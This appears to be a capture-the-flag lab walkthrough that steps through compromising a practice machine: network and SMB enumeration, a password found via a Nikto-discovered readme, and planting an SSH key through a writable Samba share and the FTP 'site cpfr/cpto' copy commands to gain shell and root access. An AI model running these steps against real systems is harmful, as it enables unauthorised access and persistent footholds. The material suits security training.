Penetration Testing Methodologies
Step 1: Run Netdiscover tool to check all the devices connected on the same network from where you can get the IP of the target.The IP found here is 192.168.1.46
Command = netdiscover -i eth0 192.168.1.54/24
Step 2: Run Nmap tool(Nmap Aggressive) using the command on the IP of the target to check all on the open ports.
Command = nmap -A 192.168.1.46
Step 3: To get the Username of the target use the Smbmap command because smb is open on port number 445 from which you will get the access of the information from where you will get the username that is smbuser. Along with the username you will also get other information like Smbdata directory that has the read and write permission.
Command = smbmap -H 192.168.1.46
To get the password of the target check for hidden files using Nikto, with the command from where you can get the hidden files and from where you will get a hidden file named ‘readme.txt’ and by putting that with IP (192.168.1.46) in the browser you can get the password that is rootroot1
Command = nikto –url http://192.168.1.46
Step 4: Now as there is a ssh port open that can be accessed which can provide the shell access of the target but at first, we need to make a pair of public key and private key to get authentication in the ssh protocol.
command = sudo ssh-keygen
In this case public key is td.pub and private key is td
Step 5 : In this using the smbclient command we will get the access to the smbdata directory in which we will put the public key in order to get the shell access.
Command = sudo smbclient //192.168.1.46/smbdata
In this we need to put the public key that we made by entering the location of the key.
Command = cd samba
put /home/kali/td.pub authorized_key
Step 6 :To shift the key to smbuser using the FTP protocol, telnet is used to get the remote access from one machine to another for which you need to shift the key from /smbdata/samba/authorized_key to /home/smbuser/.ssh/authorized_keys in order to get the ssh access.
Command = telnet 192.168.1.46 2121
Now to copy it from samba (which is a directory in smbdata) to smbuser.
Command = site cpfr /smbdata/samba/authorized_key
site cpto /home/smbuser/.ssh/authorized_keys
Step 7 : The last step is to get the shell access for which first you need to become the root user then go to the shell using ssh protocol in which you need to enter the password you got earlier (i.e. rootroot1), then you need to become the root user in that and change the directory from smbuser to root user. After that when you will check the files, you will get a file proof.txt and after reading that file you will Capture The Flag in that file.
Command = ssh -i td [email protected]
Created By – Devansh Thapar